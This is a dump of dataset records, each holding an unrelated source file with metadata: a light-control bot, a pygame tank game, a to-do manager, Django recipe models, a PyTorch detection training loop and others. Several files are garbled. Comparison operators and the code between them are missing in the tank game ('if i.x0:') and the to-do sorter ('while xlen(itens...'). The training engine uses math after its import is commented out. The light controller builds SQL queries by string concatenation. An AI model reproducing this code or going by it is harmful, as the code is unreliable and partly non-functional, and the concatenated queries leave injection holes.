= \" + str(int(status)) + \" WHERE id = \" + str(id))\n\t\tpublish.single(\"light\" + str(id), str(int(status)), 1, True)\n\n\tdef get_Status(self, id):\n\t\tresult = self.db.execute_Query(\"SELECT status FROM simpleLights WHERE id = \" + str(id))\n\t\tfor reading in result:\n\t\t\treturn bool(reading[0])\n\t\t\t\n\tdef get_All(self):\n\t\tresult = self.db.execute_Query(\"SELECT id, status FROM simpleLights\")\n\t\tresults = {}\n\t\tfor reading in result:\n\t\t\tresults[reading[0]] = bool(reading[1])\n\t\treturn results\n\t\n\tdef toggle_simple_lights(self, bot, update):\n\t\tif update.message.chat_id in self.db.get_All_Telebot_ID():\n\t\t\tkeyboard = [[InlineKeyboardButton(\"Up\", callback_data='simple_light 2')],\n\t\t\t\t\t\t[InlineKeyboardButton(\"Down\", callback_data='simple_light 1')],\n\t\t\t\t\t\t[InlineKeyboardButton(\"Cancel\", callback_data='cancel')]]\n\t\t\treply_markup = InlineKeyboardMarkup(keyboard)\n\t\t\tupdate.message.reply_text('Please choose which you want to toggle:', reply_markup=reply_markup)\n\n\tdef get_Simple_Light_Response(self):\n\t\tlights = self.get_All()\n\t\tresponse = \"\"\n\t\tfor key in lights.keys():\n\t\t\tif not lights[key]:\n\t\t\t\tresponse += (\"Simple light \" + str(self.simple_light_names[key]) + \" is on\\n\")\n\t\tif response == \"\":\n\t\t\tresponse = \"All simple lights are off\"\n\t\treturn response\n","sub_path":"pyweb/hardware/SimpleLights.py","file_name":"SimpleLights.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"396034287","text":"import pgzrun\nimport pygame\nimport math\n\npygame.display.set_mode((0,0),pygame.RESIZABLE)\nWIDTH, HEIGHT = pygame.display.Info().current_w, pygame.display.Info().current_h\n\n\nclass Pocisk:\n def __init__(self,x,y,kat):\n self.x=x+math.cos(math.radians(kat))*48\n self.y=y-math.sin(math.radians(kat))*48\n self.kat=kat\n self.pocisk=Actor(\"bullet\",bottomleft=(self.x,self.y))\n self.pocisk.angle=kat\n self.PREDKOSC_POCISKU=10\n def draw(self):\n self.pocisk.draw()\n def update(self):\n self.pocisk.x+=math.cos(math.radians(self.kat))*self.PREDKOSC_POCISKU\n self.pocisk.y-=math.sin(math.radians(self.kat))*self.PREDKOSC_POCISKU\n\nclass Wyrzutnia:\n def __init__(self):\n self.pociski=[]\n self.blokada_strzalu=False\n def zwolnienie_blokady(self):\n self.blokada_strzalu=False\n def wystrzel(self,kat,x,y):\n if(self.blokada_strzalu==False):\n self.pociski.append(Pocisk(x,y,kat))\n self.blokada_strzalu=True\n clock.schedule_unique(self.zwolnienie_blokady,1.0)\n def draw(self):\n for i in self.pociski:\n i.draw()\n def update(self):\n tmp=[]\n for i in self.pociski:\n if i.x0:\n tmp.append(i)\n self.pociski=tmp\n for i in self.pociski:\n i.update()\n\n\n\n\nclass Czolg:\n def __init__(self,x,y):\n self.x=x\n self.y=y\n self.body=Actor(\"tankbody\",(self.x,self.y))\n self.track=Actor(\"tanktrack\",(self.x,self.y+50))\n self.turret=Actor(\"tankturret\",(self.x+15,self.y-20),anchor=(\"left\",\"bottom\"))\n self.wyrzutnia=Wyrzutnia()\n self.PREDOSC_PORUSZANIA_CZOLGU=2\n self.DELTA_KAT=2\n self.MIN_KAT_TURRET=0\n self.MAX_KAT_TURRET=80\n def draw(self):\n self.turret.draw()\n self.track.draw()\n self.body.draw()\n self.wyrzutnia.draw()\n def prawo(self):\n if self.body.x83:\n self.body.x -= self.PREDOSC_PORUSZANIA_CZOLGU\n self.track.x -= self.PREDOSC_PORUSZANIA_CZOLGU\n self.turret.x -= self.PREDOSC_PORUSZANIA_CZOLGU\n def turretup(self):\n if self.turret.angle>=self.MIN_KAT_TURRET and self.turret.angle<=self.MAX_KAT_TURRET:\n self.turret.angle+=self.DELTA_KAT\n if self.turret.angle>self.MAX_KAT_TURRET:\n self.turret.angle=self.MAX_KAT_TURRET\n def turretdown(self):\n if self.turret.angle>=self.MIN_KAT_TURRET and self.turret.angle<=self.MAX_KAT_TURRET:\n self.turret.angle-=self.DELTA_KAT\n if self.turret.angle 0, 'max_concurrent processes must be greater than 0')\n self.raise_on_error = False\n\n\nclass ReexecutionConfig:\n def __init__(self, previous_run_id, step_output_handles):\n self.previous_run_id = previous_run_id\n self.step_output_handles = step_output_handles\n","sub_path":"python_modules/dagster/dagster/core/execution/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"6586395","text":"import sys\n\nTODO_FILE = 'todo.txt'\nARCHIVE_FILE = 'done.txt'\n\nRED = \"\\033[1;31m\" \nBLUE = \"\\033[1;34m\"\nCYAN = \"\\033[1;36m\"\nGREEN = \"\\033[0;32m\"\nRESET = \"\\033[0;0m\"\nBOLD = \"\\033[;1m\"\nREVERSE = \"\\033[;7m\"\nYELLOW = \"\\033[0;33m\"\n\nADICIONAR = 'a'\nREMOVER = 'r'\nFAZER = 'f'\nPRIORIZAR = 'p'\nLISTAR = 'l'\n\n# Imprime texto com cores. Por exemplo, para imprimir \"Oi mundo!\" em vermelho, basta usar\n# printCores('Oi mundo!', RED)\n# printCores('Texto amarelo e negrito', YELLOW + BOLD)\n\ndef printCores(texto, cor) :\n print(cor + texto + RESET)\n \n\n# Adiciona um compromisso aa agenda. Um compromisso tem no minimo\n# uma descrição. Adicionalmente, pode ter, em caráter opcional, uma\n# data (formato DDMMAAAA), um horário (formato HHMM), uma prioridade de A a Z, \n# um contexto onde a atividade será realizada (precedido pelo caractere\n# '@') e um projeto do qual faz parte (precedido pelo caractere '+'). Esses\n# itens opcionais são os elementos da tupla \"extras\", o segundo parâmetro da\n# função.\n#\n# extras ~ (data, hora, prioridade, contexto, projeto)\n#\n# Qualquer elemento da tupla que contenha um string vazio ('') não\n# deve ser levado em consideração. \ndef adicionar(descricao, extras):\n\n # não é possível adicionar uma atividade que não possui descrição. \n if descricao == '' :\n return False\n else:\n i=0\n novaAtividade=''\n while i < len(extras):\n if extras[i] != \"\":\n novaAtividade += extras[i]+\" \"\n if i == 1:\n novaAtividade += descricao+\" \"\n i += 1\n\n # Escreve no TODO_FILE. \n try: \n fp = open(TODO_FILE, 'a')\n fp.write(novaAtividade + \"\\n\")\n fp.close()\n except IOError as err:\n print(\"Não foi possível escrever para o arquivo \" + TODO_FILE)\n print(err)\n return False\n\n return True\n\n\n# Valida a prioridade.\ndef prioridadeValida(pri):\n if len(pri)!=3:#Verifica se a prioridade possui 3 caracteres (referentes aos parênteses e a letra)\n return False\n elif pri[0]!= \"(\" and pri[2] != \")\":#Verifica se os itens da extremidade são parênteses\n return False\n else:\n if pri[1] < \"A\" or pri[1] > \"Z\" and pri[1] < \"a\" or pri[1] > \"z\":#Verifica se item do meio é letra\n return False\n return True\n\n\n# Valida a hora. Consideramos que o dia tem 24 horas, como no Brasil, ao invés\n# de dois blocos de 12 (AM e PM), como nos EUA.\ndef horaValida(horaMin) :\n if len(horaMin) != 4 or not soDigitos(horaMin):#Verifica se possui 4 caracteres e se são números\n return False\n else:\n Hora=horaMin[0:2]#Define hora como os dois primeiros caracteres\n Minutos=horaMin[2:]#Define Minutos como os dois ultimos caracteres\n if int(Hora)>23 or int(Hora)<00:#Verifica se são horas válidas\n return False\n if int(Minutos)>59 or int(Minutos)<00:#Verifica se são minutos válidos\n return False\n return True\n\n# Valida datas. Verificar inclusive se não estamos tentando\n# colocar 31 dias em fevereiro. Não precisamos nos certificar, porém,\n# de que um ano é bissexto. \ndef dataValida(data) :\n if len(data) != 8 or not soDigitos(data):#Verifica se possui 8 caracteres e se são números\n return False\n else:\n Dia=data[0:2]#Define dia como os dois primeiros\n Mes=data[2:4]#Define mês como os proximos dois\n Ano=data[4:]#Define ano como os quatro últimos\n DiasS=[\"01\",\"03\",\"05\",\"07\",\"08\",\"10\",\"12\"]#Meses com 31 dias\n Diass=[\"04\",\"06\",\"09\",\"11\"]#Meses com 30 dias\n if int(Mes)<1 or int(Mes)>12:#Verifica se o mês é válido\n return False\n if Mes in DiasS:#Verifica qual é o mês\n if int(Dia)<1 or int(Dia)>31:#Verifica se os dias correspondem\n return False\n if Mes in Diass:#Verifica qual é o mês\n if int(Dia)<1 or int(Dia)>30:#Verifica se os dias correspondem\n return False\n if int(Mes)==2:#Caso seja fevereiro\n if int(Dia)<1 or int(Dia)>29:#Verifica a quantidade de dias\n return False\n return True\n\n# Valida que o string do projeto está no formato correto. \ndef projetoValido(proj):\n if len(proj)<2:#Verifica se possui mais de dois caracteres\n return False\n else:\n if proj[0] != \"+\":#Verifica se o primeiro é um \"+\"\n return False\n return True\n\n# Valida que o string do contexto está no formato correto. \ndef contextoValido(cont):\n if len(cont)<2:#Verifica se possui mais de dois caracteres\n return False\n else:\n if cont[0] != \"@\":#Verifica se o primeiro é um \"@\"\n return False\n return True\n\n# Valida que a data ou a hora contém apenas dígitos, desprezando espaços\n# extras no início e no fim.\ndef soDigitos(numero) :\n if type(numero) != str :\n return False\n for x in numero :\n if x < '0' or x > '9' :\n return False\n return True\n\n\n# Dadas as linhas de texto obtidas a partir do arquivo texto todo.txt, devolve\n# uma lista de tuplas contendo os pedaços de cada linha, conforme o seguinte\n# formato:\n#\n# (descrição, prioridade, (data, hora, contexto, projeto))\n#\n# É importante lembrar que linhas do arquivo todo.txt devem estar organizadas de acordo com o\n# seguinte formato:\n#\n# DDMMAAAA HHMM (P) DESC @CONTEXT +PROJ\n#\n# Todos os itens menos DESC são opcionais. Se qualquer um deles estiver fora do formato, por exemplo,\n# data que não tem todos os componentes ou prioridade com mais de um caractere (além dos parênteses),\n# tudo que vier depois será considerado parte da descrição. \ndef organizar(linhas):\n itens = []\n\n for l in linhas:\n data = '' \n hora = ''\n pri = ''\n desc = ''\n contexto = ''\n projeto = ''\n \n l = l.strip() # remove espaços em branco e quebras de linha do começo e do fim\n tokens = l.split() # quebra o string em palavras\n\n # Processa os tokens um a um, verificando se são as partes da atividade.\n # Por exemplo, se o primeiro token é uma data válida, deve ser guardado\n # na variável data e posteriormente removido a lista de tokens. Feito isso,\n # é só repetir o processo verificando se o primeiro token é uma hora. Depois,\n # faz-se o mesmo para prioridade. Neste ponto, verifica-se os últimos tokens\n # para saber se são contexto e/ou projeto. Quando isso terminar, o que sobrar\n # corresponde à descrição. É só transformar a lista de tokens em um string e\n # construir a tupla com as informações disponíveis. \n try: \n if dataValida(tokens[0]):#Verifica se o primeiro elemento é uma data\n data+=tokens.pop(0)#Caso seja, o define como data e o deleta\n if horaValida(tokens[0]):#Verifica se o primeiro elemento é uma hora\n hora+=tokens.pop(0)#Caso seja, o define como hora e o deleta\n if prioridadeValida(tokens[0]):#Verifica se o primeiro elemento é uma prioridade\n pri+=tokens.pop(0)#Caso seja, o define como prioridade e o deleta\n if projetoValido(tokens[-1]):#Verifica se o último elemento é um projeto\n projeto+=tokens.pop(-1)#Caso seja, o define como projeto e o deleta\n if contextoValido(tokens[-1]):#Verifica se o último elemento é um contexto\n contexto+=tokens.pop(-1)#Caso seja, o define como contexto e o deleta\n except: pass\n desc=\" \".join(tokens)#define descrição como os elementos finais restantes\n itens.append((desc, (data, hora, pri, contexto, projeto)))#Adiciona a lista os itens organizados em tuplas\n\n return itens\n\n\n# Datas e horas são armazenadas nos formatos DDMMAAAA e HHMM, mas são exibidas\n# como se espera (com os separadores apropridados). \n#\n# Uma extensão possível é listar com base em diversos critérios: (i) atividades com certa prioridade;\n# (ii) atividades a ser realizadas em certo contexto; (iii) atividades associadas com\n# determinado projeto; (vi) atividades de determinado dia (data específica, hoje ou amanhã). Isso não\n# é uma das tarefas básicas do projeto, porém. \ndef listar():\n dic={}#define um dicionario\n f=open(TODO_FILE,\"r\").readlines()#atribui a variavel f uma lista com as linhas do arquivo\n for x in range(len(f)):#Percorre a lista com as linhas do arquivo\n while xlen(itens[o][1][0]):\n pivo=itens[o]\n itens[o]=itens[i]\n itens[i]=pivo\n if len(pivo[1][0])==len(itens[o][1][0]):\n if len(pivo[1][1])>len(itens[o][1][1]):\n pivo=itens[o]\n itens[o]=itens[i]\n itens[i]=pivo\n \n return itens\n \ndef ordenarPorPrioridade(itens):\n x=0#Contador 1\n while x= t0) & (dsl <= t0+1.)\nhcal = hsl[K]\npcal = power[K]\npcal -= np.mean(pcal)\ntmp = zip(hcal, pcal)\ntmp.sort(key=lambda x:x[0])\nhcal, pcal = zip(*tmp)\ncalibration = UnivariateSpline(hcal, pcal, s=0.005*len(hcal))\n\npl.figure()\npl.plot(hcal, pcal, \"k.\")\npl.plot(hcal, calibration(hcal), \"r-\")\npl.grid(True)\n\npl.figure()\npl.plot(dsl, power, \"k.\")\npl.grid(True)\n\npl.figure()\npl.plot(time, power, \"k.\")\npl.plot(time, power-calibration(hsl), \"b.\")\n_, _, ymin, ymax = pl.axis()\nfor k in xrange(1, 3):\n\tpl.plot((365.25*k, 365.25*k), (ymin, ymax), \"r-\")\n\tpl.plot((365.25*(k-0.5), 365.25*(k-0.5)), (ymin, ymax), \"r--\")\npl.plot(temperature[:,0], temperature[:,1], \"g.-\")\npl.grid(True)\n\npl.show()\n","sub_path":"scripts/show-137.py","file_name":"show-137.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"193758499","text":"#!/usr/bin/env python\n#\n# ======================================================================\n#\n# Brad T. Aagaard, U.S. Geological Survey\n# Charles A. Williams, GNS Science\n# Matthew G. Knepley, University of Chicago\n#\n# This code was developed as part of the Computational Infrastructure\n# for Geodynamics (http://geodynamics.org).\n#\n# Copyright (c) 2010-2017 University of California, Davis\n#\n# See COPYING for license information.\n#\n# ======================================================================\n#\n\n## @file unittests/pytests/problems/TestTimeStepUniform.py\n\n## @brief Unit testing of TimeStepUniform object.\n\nimport unittest\nfrom pylith.problems.TimeStepUniform import TimeStepUniform\n\nfrom spatialdata.units.Nondimensional import Nondimensional\nfrom pyre.units.time import second\n\n# ----------------------------------------------------------------------\nclass Integrator:\n\n def __init__(self, dt):\n self.dt = dt\n return\n\n\n def stableTimeStep(self, mesh):\n return self.dt\n\n\n# ----------------------------------------------------------------------\nclass TestTimeStepUniform(unittest.TestCase):\n \"\"\"\n Unit testing of TimeStepUniform object.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n Setup time step object.\n \"\"\"\n normalizer = Nondimensional()\n normalizer._configure()\n\n tstep = TimeStepUniform()\n tstep._configure()\n tstep.preinitialize()\n tstep.verifyConfiguration()\n tstep.initialize(normalizer)\n self.tstep = tstep\n return\n\n\n def test_numTimeSteps(self):\n \"\"\"\n Test numTimeSteps().\n \"\"\"\n tstep = self.tstep\n\n self.assertEqual(1, tstep.numTimeSteps())\n\n tstep.totalTimeN = 4.0\n tstep.dtN = 2.0\n self.assertEqual(3, tstep.numTimeSteps())\n\n return\n\n\n def test_timeStep(self):\n \"\"\"\n Test timeStep().\n \"\"\"\n tstep = self.tstep\n\n integrators = [Integrator(4.0),\n Integrator(8.0)]\n\n from pylith.topology.Mesh import Mesh\n mesh = Mesh()\n\n self.assertEqual(1.0, tstep.timeStep(mesh, integrators))\n\n tstep.dtN = 0.5\n self.assertEqual(0.5, tstep.timeStep(mesh, integrators))\n\n caught = False\n try:\n tstep.dtN = 10.0\n tstep.timeStep(mesh, integrators)\n except RuntimeError:\n caught = True\n self.failUnless(caught)\n\n return\n\n\n def test_currentStep(self):\n \"\"\"\n Test currentStep().\n \"\"\"\n tstep = self.tstep\n\n self.assertEqual(1.0, tstep.currentStep())\n\n tstep.dtN = 1.0e-4\n self.assertEqual(1.0e-4, tstep.currentStep())\n\n return\n\n\n def test_factory(self):\n \"\"\"\n Test factory method.\n \"\"\"\n from pylith.problems.TimeStepUniform import time_step\n ts = time_step()\n return\n\n\n# End of file \n","sub_path":"unittests/pytests/problems/TestTimeStepUniform.py","file_name":"TestTimeStepUniform.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"12248726","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.core.validators import MaxValueValidator\nfrom datetime import datetime\nfrom django.db.models import Avg\n\nTYPE_RECETTE = (\n 'Entrée',\n 'Plat principal',\n 'Dessert',\n 'Accompagnement',\n 'Amuse-gueule',\n 'Boisson',\n 'Confiserie',\n 'Sauce',\n)\n\nTYPE_RECETTE_CHOICES = (\n ('0', TYPE_RECETTE[0]),\n ('1', TYPE_RECETTE[1]),\n ('2', TYPE_RECETTE[2]),\n ('3', TYPE_RECETTE[3]),\n ('4', TYPE_RECETTE[4]),\n ('5', TYPE_RECETTE[5]),\n ('6', TYPE_RECETTE[6]),\n ('7', TYPE_RECETTE[7]),\n)\n\nDIFFICULTE_RECETTE = (\n 'Très facile',\n 'Facile',\n 'Moyenne',\n 'Difficile',\n 'Très difficile'\n)\n\nDIFFICULTE_RECETTE_CHOICES = (\n ('0', DIFFICULTE_RECETTE[0]),\n ('1', DIFFICULTE_RECETTE[1]),\n ('2', DIFFICULTE_RECETTE[2]),\n ('3', DIFFICULTE_RECETTE[3]),\n ('4', DIFFICULTE_RECETTE[4]),\n)\n\n\nclass Recette(models.Model):\n auteur = models.ForeignKey(User, verbose_name='Auteur')\n date_creation = models.DateTimeField(default=datetime.now())\n date_modif = models.DateTimeField(default=datetime.now(), auto_now=True)\n titre = models.CharField(verbose_name='Titre', max_length=100)\n type = models.CharField(verbose_name='Type', max_length=1,\n choices=TYPE_RECETTE_CHOICES)\n difficulte = models.CharField(verbose_name='Difficulté',\n max_length=1,\n choices=DIFFICULTE_RECETTE_CHOICES)\n cout = models.PositiveIntegerField(verbose_name='Coût')\n temps_preparation = models.PositiveIntegerField(\n verbose_name='Temps de préparation')\n temps_cuisson = models.PositiveIntegerField(\n verbose_name='Temps de cuisson')\n temps_repos = models.PositiveIntegerField(verbose_name='Temps de repos')\n ingredients = models.TextField(verbose_name='Ingrédients', max_length=1000)\n etapes = models.TextField(verbose_name='Etapes', max_length=1000)\n\n def ingredients_as_list(self):\n return self.ingredients.split('\\n')\n\n def etapes_as_list(self):\n return self.etapes.split('\\n')\n\n def difficulte_display(self):\n return DIFFICULTE_RECETTE[int(self.difficulte)]\n\n def type_display(self):\n return TYPE_RECETTE[int(self.type)]\n\n def nb_note(self):\n return Note.objects.filter(recette=self).count()\n\n def moyenne_note(self):\n if self.nb_note() > 0:\n return Note.objects.filter(recette=self\n ).aggregate(\n Avg('valeur'))['valeur__avg']\n else:\n return 0\n\n def note_display(self):\n return str(self.moyenne_note()) +\\\n \" / 10 (\" + str(self.nb_note()) + \" notes)\"\n\n def __str__(self):\n return self.titre\n\n\nclass Commentaire(models.Model):\n date = models.DateTimeField(default=datetime.now())\n auteur = models.ForeignKey(User, verbose_name='Auteur')\n recette = models.ForeignKey('Recette', verbose_name='Recette')\n texte = models.TextField(max_length=500, verbose_name='Texte')\n\n def __str__(self):\n return \"Par \" + str(self.auteur) + \" pour \" + str(self.recette) +\\\n \" \" + str(self.date)\n\n\nclass Note(models.Model):\n auteur = models.ForeignKey(User, verbose_name='Auteur')\n recette = models.ForeignKey('Recette', verbose_name='Recette')\n valeur = models.PositiveIntegerField(verbose_name='Note',\n validators=[MaxValueValidator(10)])\n\n def __str__(self):\n return \"(\" + str(self.valeur) + \" / 10)\" + \" par \" +\\\n str(self.auteur) + \" pour \" + str(self.recette)\n\n","sub_path":"recettes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"480687051","text":"#\n# BSD 3-Clause License\n#\n# Copyright (c) 2017 xxxx\n# All rights reserved.\n# Copyright 2021 Huawei Technologies Co., Ltd\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice, this\n# list of conditions and the following disclaimer.\n#\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n#\n# * Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from\n# this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n# ============================================================================\n#import math\nimport sys\nimport time\nimport torch\n\nimport torchvision.models.detection.mask_rcnn\n\nfrom coco_utils import get_coco_api_from_dataset\nfrom coco_eval import CocoEvaluator\nimport utils\n\n\ndef train_one_epoch(model, optimizer, data_loader, device, epoch, print_freq):\n model.train()\n metric_logger = utils.MetricLogger(delimiter=\" \")\n metric_logger.add_meter('lr', utils.SmoothedValue(window_size=1, fmt='{value:.6f}'))\n header = 'Epoch: [{}]'.format(epoch)\n\n lr_scheduler = None\n if epoch == 0:\n warmup_factor = 1. / 1000\n warmup_iters = min(1000, len(data_loader) - 1)\n\n lr_scheduler = utils.warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor)\n\n for images, targets in metric_logger.log_every(data_loader, print_freq, header):\n images = list(image.to(device) for image in images)\n targets = [{k: v.to(device) for k, v in t.items()} for t in targets]\n\n loss_dict = model(images, targets)\n\n losses = sum(loss for loss in loss_dict.values())\n\n # reduce losses over all GPUs for logging purposes\n loss_dict_reduced = utils.reduce_dict(loss_dict)\n losses_reduced = sum(loss for loss in loss_dict_reduced.values())\n\n loss_value = losses_reduced.item()\n\n if not math.isfinite(loss_value):\n print(\"Loss is {}, stopping training\".format(loss_value))\n print(loss_dict_reduced)\n sys.exit(1)\n\n optimizer.zero_grad()\n losses.backward()\n optimizer.step()\n\n if lr_scheduler is not None:\n lr_scheduler.step()\n\n metric_logger.update(loss=losses_reduced, **loss_dict_reduced)\n metric_logger.update(lr=optimizer.param_groups[0][\"lr\"])\n\n\ndef _get_iou_types(model):\n model_without_ddp = model\n if isinstance(model, torch.nn.parallel.DistributedDataParallel):\n model_without_ddp = model.module\n iou_types = [\"bbox\"]\n if isinstance(model_without_ddp, torchvision.models.detection.MaskRCNN):\n iou_types.append(\"segm\")\n if isinstance(model_without_ddp, torchvision.models.detection.KeypointRCNN):\n iou_types.append(\"keypoints\")\n return iou_types\n\n\n@torch.no_grad()\ndef evaluate(model, data_loader, device):\n n_threads = torch.get_num_threads()\n # FIXME remove this and make paste_masks_in_image run on the GPU\n torch.set_num_threads(1)\n cpu_device = torch.device(\"cpu\")\n model.eval()\n metric_logger = utils.MetricLogger(delimiter=\" \")\n header = 'Test:'\n\n coco = get_coco_api_from_dataset(data_loader.dataset)\n iou_types = _get_iou_types(model)\n coco_evaluator = CocoEvaluator(coco, iou_types)\n\n for image, targets in metric_logger.log_every(data_loader, 100, header):\n image = list(img.to(device) for img in image)\n targets = [{k: v.to(device) for k, v in t.items()} for t in targets]\n\n torch.cuda.synchronize()\n model_time = time.time()\n outputs = model(image)\n\n outputs = [{k: v.to(cpu_device) for k, v in t.items()} for t in outputs]\n model_time = time.time() - model_time\n\n res = {target[\"image_id\"].item(): output for target, output in zip(targets, outputs)}\n evaluator_time = time.time()\n coco_evaluator.update(res)\n evaluator_time = time.time() - evaluator_time\n metric_logger.update(model_time=model_time, evaluator_time=evaluator_time)\n\n # gather the stats from all processes\n metric_logger.synchronize_between_processes()\n print(\"Averaged stats:\", metric_logger)\n coco_evaluator.synchronize_between_processes()\n\n # accumulate predictions from all images\n coco_evaluator.accumulate()\n coco_evaluator.summarize()\n torch.set_num_threads(n_threads)\n return coco_evaluator\n","sub_path":"PyTorch/built-in/cv/classification/DenseNet169_ID0454_for_PyTorch/references/detection/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"6082196","text":"import numpy as np\n\ndef order_points(pts):\n\t# 初始化矩形4个顶点的坐标\n\trect = np.zeros((4, 2), dtype='float32')\n\t# 坐标点求和 x+y\n\ts = pts.sum(axis = 1)\n\t# np.argmin(s) 返回最小值在s中的序号\n\trect[0] = pts[np.argmin(s)]\n\trect[2] = pts[np.argmax(s)]\n\t# diff就是后一个元素减去前一个元素 y-x\n\tdiff = np.diff(pts, axis=1)\n\trect[1] = pts[np.argmin(diff)]\n\trect[3] = pts[np.argmax(diff)]\n\t# 返回矩形有序的4个坐标点\n\treturn rect","sub_path":"component/additionModule.py","file_name":"additionModule.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"378322912","text":"class VarHandler(object):\r\n var_dict = {\r\n \"numeric_vars_zero_fill\" : [\r\n # 'mortgage_-_amount_exact_',\r\n 'mortgage',\r\n 'visits',\r\n 'cjm-currentphase',\r\n \"samen_afsluiten_views\",\r\n \"zelf_afsluiten_views\",\r\n \"jouw_woonsituatie_views\",\r\n \"eerste_woning_views\",\r\n \"zelf_berekenen_views\",\r\n \"bestaande_woning_views\",\r\n \"volgende_woning_views\",\r\n 'finance_-_private_deposits',\r\n 'finance_-_loan_payments_month',\r\n 'loan_payments',\r\n \"bestaande_woning_count\",\r\n \"volgende_woning_count\",\r\n \"starter_count\"\r\n ],\r\n \"numeric_vars_mean_fill\" : [\r\n 'currentscreenwidth',\r\n 'visitclicks',\r\n 'currentscreenheight',\r\n 'clickcount',\r\n 'frequency',\r\n 'momentum',\r\n 'recency',\r\n 'intensity',\r\n 'recent_intensity',\r\n 'averagetime',\r\n 'engagement_score',\r\n 'loyalty_score',\r\n 'prospect_score',\r\n 'brand_prospect_score',\r\n # 'finance_-_annual_income',\r\n 'annual_income',\r\n 'age_partner',\r\n # 'finance_-_annual_income_partner',\r\n 'annual_income_partner',\r\n 'buy_price',\r\n 'home_-_asking_price_exact_',\r\n 'private_deposits',\r\n 'plot_area',\r\n 'surface',\r\n 'contents',\r\n 'built',\r\n 'age',\r\n \"time_to_calculator_use\",\r\n 'firstvisit',\r\n #'lastvisit',\r\n\r\n ],\r\n \"categorical_vars_median\" : [\r\n 'language',\r\n 'resolution',\r\n 'currentbrowsername',\r\n 'currentbrowserversion',\r\n 'currentosversion',\r\n 'devicetype',\r\n 'currentosname',\r\n 'browsername',\r\n 'currentresolution',\r\n 'browserversion',\r\n 'osname',\r\n 'osversion',\r\n 'devicetypes',\r\n 'testgroup',\r\n 'sent_to_connection',\r\n 'sent_to_system',\r\n 'visiteddomain',\r\n 'visitedchannel',\r\n 'privacy_legislation',\r\n 'entrypage',\r\n\r\n 'referrerhost',\r\n 'mr_geo_geoname_id',\r\n 'geo_geoname_id',\r\n 'referrerhosts',\r\n 'mr_geo_country_name',\r\n 'mr_geo_time_zone',\r\n 'mr_geo_continent_code',\r\n 'mr_geo_continent_name',\r\n 'mr_geo_country_iso_code',\r\n # 'geo_time_zone',\r\n # 'geo_country_name',\r\n # 'geo_country_iso_code',\r\n # 'geo_continent_name',\r\n # 'geo_continent_code',\r\n 'consented_objectives',\r\n 'mr_geo_subdivision_1_iso_code',\r\n 'mr_geo_subdivision_2_iso_code',\r\n 'mr_geo_subdivision_2_name',\r\n 'mr_geo_subdivision_1_name',\r\n 'geo_city_name',\r\n 'origin_source',\r\n 'geo_subdivision_1_name',\r\n 'geo_subdivision_2_name',\r\n 'origin_type',\r\n 'geo_subdivision_1_iso_code',\r\n 'geo_subdivision_2_iso_code',\r\n 'origin_detail',\r\n 'mr_geo_latlong',\r\n 'geo_latlong',\r\n 'received_from_connection',\r\n 'received_from_system',\r\n 'engagement',\r\n 'utm_medium',\r\n 'utm_source',\r\n 'Home-verzekering',\r\n 'utm_campaign',\r\n 'utm_content',\r\n 'current_utm_source',\r\n 'current_utm_campaign',\r\n 'current_utm_medium',\r\n 'visit_time',\r\n\r\n 'current_utm_content',\r\n 'permissionlevel',\r\n 'marital_state',\r\n 'permissionlevelset',\r\n 'cookies_accepted',\r\n 'visited_url_most_recent_',\r\n 'prospect',\r\n 'mortgage_type',\r\n 'mortgage_provider',\r\n 'interested_in',\r\n 'campaigns_with_subsequent_action',\r\n 'search_state',\r\n 'bouw',\r\n 'Brand-Vestigingnummer',\r\n 'financial_obligations',\r\n 'mortgage_type_interest',\r\n 'pref_-_news_-_interesse',\r\n 'property_build_plot',\r\n 'brand_-_featured_button_click',\r\n 'property_type',\r\n 'utm_term',\r\n 'situation_-_first_mariage',\r\n 'bkr',\r\n 'current_utm_term',\r\n 'nationality',\r\n 'home_have_in_mind',\r\n 'loan_-_type_of_income',\r\n 'int_-_product',\r\n ],\r\n \"categorical_vars_none\":\r\n [\r\n 